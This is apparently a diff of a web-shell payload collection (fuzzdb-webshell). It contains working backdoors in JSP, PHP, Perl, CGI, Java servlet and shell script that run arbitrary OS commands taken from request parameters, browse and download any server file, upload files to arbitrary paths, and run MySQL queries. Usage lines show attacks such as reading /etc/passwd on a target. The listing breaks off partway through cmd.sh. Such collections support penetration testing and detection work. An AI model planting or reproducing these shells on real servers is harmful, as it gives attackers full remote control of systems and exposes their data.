int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

View file

@ -0,0 +1,31 @@
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "\n<BR>");
Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
%>
</pre>
</BODY></HTML>

View file

@ -0,0 +1,162 @@
<jsp:useBean id="prop" scope="page" class="java.util.Properties" />
<%@ page import="java.io.*,java.util.*,javax.servlet.*" %>
<%
//
// JSP_KIT
//
// up.jsp = File Upload (win32)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<html>
<form name="test" method="post" action="" enctype="multipart/form-data">
<input type="File" name="fichero">
<input type="Submit" value="Upload" name="Submit">
</form>
</html>
<%!
public String getBoundary(HttpServletRequest request,Properties prop) throws ServletException,IOException{
String boundary = null;
Enumeration enum = request.getHeaderNames();
while(enum.hasMoreElements()){
String header = (String)enum.nextElement();
String hvalue = request.getHeader(header);
prop.setProperty((header).toLowerCase(),hvalue);
if("content-type".equalsIgnoreCase(header) ){
int idx = hvalue.lastIndexOf("boundary=");
if(idx != -1 ){
boundary= hvalue.substring(idx+9 , hvalue.length());
}
}
}
return boundary;
}
public String getFileName(String secondline){
int len = secondline.length();
int idx = secondline.lastIndexOf("filename=");
if(idx == -1 ) return null;
String filename = secondline.substring(idx+10 , len-1);
filename = filename.replace('\\','/');
idx = filename.lastIndexOf("/");
idx = idx + 1;
filename = filename.substring( idx );
return filename;
}
%>
<%
String DPATH = "c:\\";
int ROUGHSIZE = 640000; // BUG: Corta el fichero si es mayor de 640Ks
int MAXSIZE = 10; // 10 Mega Byte
String boundary = getBoundary(request,prop);
if(boundary == null ){
boundary = prop.getProperty("boundary");
}else{
boundary = "--"+boundary;
}
if(boundary == null ){
return;
}
Long contentsize = new Long(prop.getProperty("content-length","0"));
int c;
StringWriter st = new StringWriter();
if(contentsize.longValue() < 1L ){
return;
}
long l = contentsize.longValue() - ROUGHSIZE;
int KB = 1024;
int MB = 1024 * KB;
int csize = (int)(l / MB);
if(csize > MAXSIZE ){
return;
}
ServletInputStream fin = request.getInputStream();
int cn;
int count=0;
while((c=fin.read()) != -1 ){
if( c == '\r') break;
st.write(c);
count++;
}
c=fin.read();
String tboundary = st.getBuffer().toString();
tboundary=tboundary.trim();
if(! tboundary.equalsIgnoreCase( boundary) ){
return;
}
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write(c);
}
c=fin.read();
String secondline = st.getBuffer().toString();
String filename = getFileName(secondline);
st.close();
st = null;
st = new StringWriter();
while((c=fin.read()) != -1 ){
if( c == '\r' ) break;
st.write( c );
}
c=fin.read();
fin.read();
fin.read();
File newfile = null;
FileOutputStream fout =null;
try{
if(filename == null) throw new FileNotFoundException("File Name not found");
newfile = new File(DPATH+filename);
fout = new FileOutputStream( newfile );
}catch(FileNotFoundException fnexp){
fin.close();
return;
}
byte b[] = null;
while(l > 1024L){
b = new byte[1024];
fin.read(b,0,1024);
fout.write(b);
b=null;
l -= 1024L;
}
if(l > 0){
b = new byte[(int)l];
fin.read(b,0,(int)l);
fout.write(b);
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((c = fin.read()) != -1){
baos.write(c);
}
String laststring = baos.toString();
int idx = laststring.indexOf(boundary);
b = baos.toByteArray();
if(idx > 2){
fout.write(b,0,idx-2);
}else{
fout.close();
newfile.delete();
return;
}
fout.flush();
fout.close();
fin.close();
out.println("FileName: " + newfile.getName());
out.println("FileSize: " + newfile.length());
%>

View file

@ -0,0 +1,25 @@
<?
//
// PHP_KIT
//
// cmd.php = Command Execution
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>

View file

@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// list.php = Directory & File Listing
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<?
if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}
if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "<br><hr><pre>";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}
?>

View file

@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,33 @@
<?
//
// PHP_KIT
//
// up.php = File Upload
//
// by: The Dark Raver
// modified: 21/01/2004
//
?>
<html><body>
<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<p>Local File: <input name="userfile" type="file">
<p>Remote File: <input name="remotefile" type="text">
<input type="submit" value="Send">
</form><br><br><br>
<?
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
echo "No File Uploaded";
}
?>
</html></body>

View file

@ -0,0 +1,67 @@
#!/usr/bin/perl
#
# PerlKit-0.1 - http://www.t0s.org
#
# cmd.pl: Run commands on a webserver
use strict;
my ($cmd, %FORM);
$|=1;
print "Content-Type: text/html\r\n";
print "\r\n";
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'cmd'}) {
$cmd = $FORM{'cmd'};
}
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="submit" value="Run">
</form>
<pre>';
if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";
open(CMD, "($cmd) 2>&1 |") || print "Could not execute command";
while(<CMD>) {
print;
}
close(CMD);
print "-"x80;
print "\n";
}
print "</pre>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}

View file

@ -0,0 +1,116 @@
#!/usr/bin/perl
#
# PerlKit-0.1 - http://www.t0s.org
#
# browse.pl: Browse and download files from a webserver
use strict;
my ($path, %FORM);
$|=1;
# Get parameters
%FORM = parse_parameters($ENV{'QUERY_STRING'});
if(defined $FORM{'path'}) {
$path = $FORM{'path'};
} else {
$path = "/";
}
if(-f $path) { # Download selected file
print "Content-Type: application/octet-stream\r\n";
print "\r\n";
open(FILE, "< $path") || print "Could not open file\n";
while(<FILE>) {
print;
}
close(FILE);
exit;
}
print "Content-Type: text/html\r\n";
print "\r\n";
print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="path" size=45 value="' . $path . '">
<input type="submit" value="List">
</form>
Directory ' . $path . ' contents:
<p>
<font face="courier">
<table>';
if(defined $FORM{'path'}) {
opendir(DIR, $path) || print "Could not open directory";
foreach (sort(readdir(DIR))) {
print get_fileinfo($path, $_). "\n";
}
closedir(DIR);
}
print "</table></font>";
sub parse_parameters ($) {
my %ret;
my $input = shift;
foreach my $pair (split('&', $input)) {
my ($var, $value) = split('=', $pair, 2);
if($var) {
$value =~ s/\+/ /g ;
$value =~ s/%(..)/pack('c',hex($1))/eg;
$ret{$var} = $value;
}
}
return %ret;
}
sub get_fileinfo ($$) {
my $ret;
my ($dir,$filename) = @_;
my $file = $dir . "/" . $filename;
$file=~s/\/+/\//g;
$ret = "<tr>";
$ret .= "<td>";
if(-d $file) {
$file=~s/\/[^\/]+\/\.\./\//g;
$ret .= "<a href=\"?path=$file\">$filename</a>";
} else {
$ret .= "$filename <a href=\"?path=$file\">[D]</a>" ;
}
$ret .= "</td>";
my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size, $atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
$ret .= "<td width=30'>&nbsp;</td>";
$ret .= "<td>$size</td>";
$ret .= "<td>". getpwuid($uid) ."</td>";
$ret .= "<td>". getgrgid($gid) ."</td>";
$ret .= "</tr>";
return $ret;
}

View file

@ -0,0 +1,34 @@
#!/usr/bin/perl -w
use strict;
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $req = $ENV{QUERY_STRING};
chomp ($req);
$req =~ s/%20/ /g;
$req =~ s/%3b/;/g;
print "<html><body>";
print '<!-- Simple CGI backdoor by DK (http://michaeldaw.org) -->';
if (!$req) {
print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
}
else {
print "Executing: $req";
}
print "<pre>";
my @cmd = `$req`;
print "</pre>";
foreach my $line (@cmd) {
print $line . "<br/>";
}
print "</body></html>";
# <!-- http://michaeldaw.org 2006 -->

View file

@ -0,0 +1,555 @@
#!/usr/bin/perl
######################################################
# upload a file with netscape 2.0+ or IE 4.0+
# Muhammad A Muquit
# When: Long time ago
# Changelog:
# James Bee" <JamesBee@home.com> reported that from Windows filename
# such as c:\foo\fille.x saves as c:\foo\file.x, Fixed, Jul-22-1999
# Sep-30-2000, muquit@muquit.com
# changed the separator in count.db to | from :
# As in NT : can be a part of a file path, e.g. c:/foo/foo.txt
######################################################
#
# $Revision: 5 $
# $Author: Muquit $
# $Date: 3/28/04 9:38p $
#use strict;
use CGI;
# if you want to restrict upload a file size (in bytes), uncomment the
# next line and change the number
#$CGI::POST_MAX=50000;
$|=1;
my $version="V1.4";
## vvvvvvvvvvvvvvvvvvv MODIFY vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
# the text database of the user. The text database contains the |
# separated items, namely login|encrypted password|upload path
# example: muquit|fhy687kq1hger|/usr/local/web/upload/muquit
# if no path is specified, the file must be located in the cgi-bin directory.
#my $g_upload_db="upload.db";
# overwrite the existing file or not. Default is to overwrite
# chanage the value to 0 if you do not want to overwrite an existing file.
my $g_overwrite=1;
# if you want to restrict upload to files with certain extentions, change
# the value of $g_restrict_by_ext=1 and ALSO modify the @g_allowed_ext if you
# want to add other allowable extensions.
my $g_restrict_by_ext=0;
# case insensitive, so file with Jpeg JPEG GIF gif etc will be allowed
my @g_allowed_ext=("jpeg","jpg","gif","png");
## ^^^^^^^^^^^^^^^^^^^ MODIFY ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#-------------- globals---------- STARTS ------------------
my $query=new CGI;
my $g_debug=0;
my $g_title="File upload";
my $g_upload_path='/tmp';
#-------------- globals---------- ENDS ------------------
print $query->header;
# Java Script for form validation
#
my $JSCRIPT=<<EJS;
var returnVal=true;
var DEBUG=0;
//===========================================================================
// Purpose: check if field is blank or NULL
// Params:
// field (IN)
// errorMsg (IN - MODIFIED)
// fieldTitle (IN)
// Returns:
// errorMsg - error message
// Globals:
// sets global variable (returnVal) to FALSE if field is blank or NULL
// Comments:
// JavaScript code adapted from netscape software registration form.
// ma_muquit\@fccc.edu, May-09-1997
//===========================================================================
function ValidateAllFields(obj)
{
returnVal = true;
errorMsg = "The required field(s):\\n";
// make sure all the fields have values
if (isSomeFieldsEmpty(obj) == true)
{
// DISPLAY ERROR MSG
displayErrorMsg();
returnVal = false;
}
if (returnVal == true)
document.forms[0].submit();
else
return (false);
}
//===========================================================================
function displayErrorMsg()
{
errorMsg += "\\nhas not been completed.";
alert(errorMsg);
}
//===========================================================================
function isSomeFieldsEmpty(obj)
{
var
returnVal3=false;
// check if login is null
# if (obj.userid.value == "" || obj.userid.value == null)
# {
# errorMsg += " " + "Userid" + "\\n";
# returnVal3=true;
# }
// check if Password is null
# if (obj.password.value == "" || obj.password.value == null)
# {
# errorMsg += " " + "Password" + "\\n";
# returnVal3=true;
# }
// check if upload_file is null
if (obj.upload_file.value == "" || obj.upload_file.value == null)
{
errorMsg += " " + "Upload filename" + "\\n";
returnVal3=true;
}
return (returnVal3);
}
EJS
;
# print the HTML HEADER
&printHTMLHeader;
if ($query->path_info eq "/author" or $query->path_info eq "/about")
{
&printForm;
&printAuthorInfo;
return;
}
if ($query->param)
{
&doWork();
}
else
{
&printForm();
}
##-----
# printForm() - print the HTML form
##-----
sub printForm
{
print "<center>\n";
print "<table border=0 bgcolor=\"#c0c0c0\" cellpadding=5 cellspacing=0>\n";
print $query->start_multipart_form,"\n";
#------------- userid
#print "<tr>\n";
#print "<td align=\"right\">\n";
#print "Userid:\n";
#print "</td>\n";
#print "<td>\n";
#print $query->textfield(-name=>'userid',
# -size=>20);
#print "</td>\n";
#print "</tr>\n";
#------------- password
#print "<tr>\n";
#print "<td align=\"right\">\n";
#print "Password:\n";
#print "</td>\n";
#print "<td>\n";
#print $query->password_field(-name=>'password',
# -size=>20);
#print "</td>\n";
#print "</tr>\n";
#------------- upload
print "<tr>\n";
print "<td align=\"right\">\n";
print "Upload file:\n";
print "</td>\n";
print "<td>\n";
print $query->filefield(-name=>'upload_file',
-size=>30,
-maxlength=>80);
print "</td>\n";
print "</tr>\n";
#------------- submit
print "<tr>\n";
print "<td colspan=2 align=\"center\">\n";
print "<hr noshade size=1>\n";
print $query->submit(-label=>'Upload',
-value=>'Upload',
-onClick=>"return ValidateAllFields(this.form)"),"\n";
print "</td>\n";
print "</tr>\n";
print $query->endform,"\n";
print "</table>\n";
print "</center>\n";
}
##------
# printHTMLHeader()
##------
sub printHTMLHeader
{
print $query->start_html(
-title=>"$g_title",
-script=>$JSCRIPT,
-bgcolor=>"#ffffff",
-link=>"#ffff00",
-vlink=>"#00ffff",
-alink=>"#ffff00",
-text=>"#000000");
}
##-------
# doWork() - upload file
##-------
sub doWork
{
##################
my $em='';
##################
# import the paramets into a series of variables in 'q' namespace
$query->import_names('q');
# check if the necessary fields are empty or not
#$em .= "<br>You must specify your Userid!<br>" if !$q::userid;
#$em .= "You must specify your Password!<br>" if !$q::password;
$em .= "You must select a file to upload!<br>" if !$q::upload_file;
&printForm();
if ($em)
{
&printError($em);
return;
}
#if (&validateUser() == 0)
#{
# &printError("Will not upload! Could not validate Userid: $q::userid");
# return;
#}
# if you want to restrict upload to files with certain extention
if ($g_restrict_by_ext == 1)
{
my $file=$q::upload_file;
my @ta=split('\.',$file);
my $sz=scalar(@ta);
if ($sz > 1)
{
my $ext=$ta[$sz-1];
if (! grep(/$ext/i,@g_allowed_ext))
{
&printError("You are not allowed to upload this file");
return;
}
}
else
{
&printError("You are not allowed to upload this file");
return;
}
}
# now upload file
&uploadFile();
if ($g_debug == 1)
{
my @all=$query->param;
my $name;
foreach $name (@all)
{
print "$name ->", $query->param($name),"<br>\n";
}
}
}
##------
# printError() - print error message
##------
sub printError
{
my $em=shift;
print<<EOF;
<center>
<hr noshade size=1 width="80%">
<table border=0 bgcolor="#000000" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=5 cellspacing=1>
<tr">
<td bgcolor="#ffefd5" width="100%">
<font color="#ff0000"><b>Error -</b></font>
$em</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
##--
# validate login name
# returns 1, if validated successfully
# 0 if validation fails due to password or non existence of login
# name in text database
##--
sub validateUser
{
my $rc=0;
my ($u,$p);
#my $userid=$query->param('userid');
#my $plain_pass=$query->param('password');
# open the text database
unless(open(PFD,$g_upload_db))
{
my $msg=<<EOF;
Could not open user database: $g_upload_db
<br>
Reason: $!
<br>
Make sure that your web server has read permission to read it.
EOF
;
&printError("$msg");
return;
}
# first check if user exist
$g_upload_path='';
my $line='';
while (<PFD>)
{
$line=$_;
chomp($line);
# get rid of CR
$line =~ s/\r$//g;
($u,$p,$g_upload_path)=split('\|',$line);
#if ($userid eq $u)
#{
# $rc=1;
# last;
#}
}
close(PFD);
if (crypt($plain_pass,$p) ne $p)
{
$rc=0;
}
return ($rc);
}
##--------
# uploadFile()
##--------
sub uploadFile
{
my $bytes_read=0;
my $size='';
my $buff='';
my $start_time;
my $time_took;
my $filepath='';
my $filename='';
my $write_file='';
$filepath=$query->param('upload_file');
# James Bee" <JamesBee@home.com> reported that from Windows filename
# such as c:\foo\fille.x saves as c:\foo\file.x, so we've to get the
# filename out of it
# look at the last word, hold 1 or more chars before the end of the line
# that doesn't include / or \, so it will take care of unix path as well
# if it happens, muquit, Jul-22-1999
if ($filepath =~ /([^\/\\]+)$/)
{
$filename="$1";
}
else
{
$filename="$filepath";
}
# if there's any space in the filename, get rid of them
$filename =~ s/\s+//g;
$write_file="$g_upload_path" . "/" . "$filename";
&print_debug("Filename=$filename");
&print_debug("Writefile= $write_file");
if ($g_overwrite == 0)
{
if (-e $write_file)
{
&printError("File $filename exists, will not overwrite!");
return;
}
}
if (!open(WFD,">$write_file"))
{
my $msg=<<EOF;
Could not create file: <code>$write_file</code>
<br>
It could be:
<ol>
<li>The upload directory: <code>\"$g_upload_path\"</code> does not have write permission for the
web server.
<li>The upload.db file has Control character at the end of line
</ol>
EOF
;
&printError("$msg");
return;
}
$start_time=time();
while ($bytes_read=read($filepath,$buff,2096))
{
$size += $bytes_read;
binmode WFD;
print WFD $buff;
}
&print_debug("size= $size");
close(WFD);
if ((stat $write_file)[7] <= 0)
{
unlink($write_file);
&printError("Could not upload file: $filename");
return;
}
else
{
$time_took=time()-$start_time;
print<<EOF;
<center>
<hr noshade size=1 width="90%">
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=10 cellspacing=2>
<tr align="center">
<td bgcolor="#000099" width="100%">
<font color="#ffffff">
File
<font color="#00ffff"><b>$filename</b></font> of size
<font color="#00ffff"><b>$size</b></font> bytes is
uploaded successfully!
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
}
sub printAuthorInfo
{
my $url="http://www.muquit.com/muquit/";
my $upl_url="http://muquit.com/muquit/software/upload_pl/upload_pl.html";
print<<EOF;
<center>
<hr noshade size=1 width="90%">
<table border=0 bgcolor="#c0c0c0" cellpadding=0 cellspacing=0>
<tr>
<td>
<table border=0 width="100%" cellpadding=10 cellspacing=2>
<tr align="center">
<td bgcolor="#000099" width="100%">
<font color="#ffffff">
<a href="$upl_url">
upload.pl</a> $version by
<a href="$url">Muhammad A Muquit</A>
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
EOF
;
}
sub print_debug
{
my $msg=shift;
if ($g_debug)
{
print "<code>(debug) $msg</code><br>\n";
}
}

View file

@ -0,0 +1,43 @@
/*
* CmdServlet.java 20/01/2004
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class CmdServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
out.print("<input type=\"text\" name=\"cmd\">");
out.print("<input type=\"submit\" value=\"Send\">");
out.print("</form>");
if(req.getParameter("cmd") != null) {
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
DataInputStream procIn = new DataInputStream(p.getInputStream());
int c='\0';
while ((c=procIn.read()) != -1) {
out.print((char)c);
}
}
out.print("\n<hr></pre>");
out.print("</body></html>");
}
public String getServletInfo() {
return "CmdServlet 0.1";
}
}

View file

@ -0,0 +1,86 @@
/*
* ListServlet.java
*
* @author Sierra
* @version 0.1
*/
import java.io.*;
import javax.servlet.ServletException;
import javax.servlet.http.*;
public class ListServlet extends HttpServlet
{
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
PrintWriter printwriter = res.getWriter();
String path = req.getParameter("file");
printwriter.write("<HTML>\n<HEAD>\n<TITLE>Directory Listing</TITLE>\n</HEAD>\n<BODY>\n");
printwriter.write("<FONT Face=\"Courier New, Helvetica\" Color=\"Black\">\n");
if(req.getParameter("file")==null) path = "c:\\";
printwriter.write("<hr><br><B>Path: <U>" + path + "</U></B><BR><BR><hr><PRE>\n");
File file = new File(path);
if(file.isDirectory())
{
String s = new String("Unknown");
String s2 = new String("Black");
File afile[] = file.listFiles();
for(int i = 0; i < afile.length; i++)
{
String s1 = new String(afile[i].toString());
printwriter.write("(");
String s3;
if(afile[i].isDirectory())
{
printwriter.write("d");
s1 = s1 + "/";
s3 = new String("Blue");
} else
if(afile[i].isFile())
{
printwriter.write("-");
s3 = new String("Green");
} else
{
printwriter.write("?");
s3 = new String("Red");
}
if(afile[i].canRead())
printwriter.write("r");
else
printwriter.write("-");
if(afile[i].canWrite())
printwriter.write("w");
else
printwriter.write("-");
printwriter.write(") <A Style='Color: " + s3.toString() + ";' HRef='?file=" + s1.toString() + "'>" + s1.toString() + "</A> " + "( Size: " + afile[i].length() + " bytes )<BR>\n");
}
printwriter.write("<hr></FONT></BODY></HTML>");
} else
if(file.canRead())
{
FileInputStream fileinputstream = new FileInputStream(file);
int j = 0;
while(j >= 0)
{
j = fileinputstream.read();
printwriter.write(j);
}
fileinputstream.close();
} else
{
printwriter.write("Can't Read file<BR>");
}
}
public String getServletInfo() {
return "Directory Listing";
}
}

View file

@ -0,0 +1,71 @@
/*
* UpServlet.java 29/04/2005
*
* @author The Dark Raver
* @version 0.1
*/
import java.io.*;
import javax.servlet.*;
import javax.servlet.http.*;
public class UpServlet extends HttpServlet {
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
res.setContentType("text/html");
PrintWriter out = res.getWriter();
out.print("<html><body>");
out.print("<br><form method=\"POST\" action=\"\" enctype=\"multipart/form-data\">");
out.print("UPLOAD <input type=\"file\" name=\"file\" size=\"60\">");
out.print("<input type=\"submit\" value=\"Upload\">");
out.print("</form>");
out.print("</body></html>");
}
public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
String tag = new String();
int c = '\0';
int contador = 0;
ServletInputStream in = req.getInputStream();
DataInputStream post = new DataInputStream(in);
PrintWriter out = res.getWriter();
res.setContentType("text/html");
out.print("<pre>");
while((c=post.read()) != -1 && c != '\r' && c != '\n') {
tag=tag.concat("" + (char)c);
contador++;
}
for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
// (!) Uploaded File Name
File newfile = new File("c:\\install.log");
/////////////////////////
FileOutputStream fileout = new FileOutputStream(newfile);
for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
c=post.read();
fileout.write((char)c);
}
fileout.close();
out.print("<== OK");
}
public String getServletInfo() {
return "UpServlet 0.1";
}
}

372
fuzzdb-webshell/sh/cmd.sh Normal file
View file

@ -0,0 +1,372 @@
#!/bin/sh
#
# SH_KIT
#
# cmd.sh = Command Execution
#
# by: Ludoz
# modified: 23/04/2004
#
# Version 1.2 - 28/5/2003
#
###
###
### Configuracion
###
###
#
# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
#
PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
###
###
### La configuracion acaba aqui
###
###
#
# PATHs mas habituales de los 3 comandos base
#
TEST="/usr/bin/test"
BASENAME="/bin/basename"
DIRNAME="/usr/bin/dirname"
# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
for i in $PATHS ; do
TEST="$i/test"
if (eval $TEST \"1\" = \"1\" ); then
break
fi
done
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=test
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=""
echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
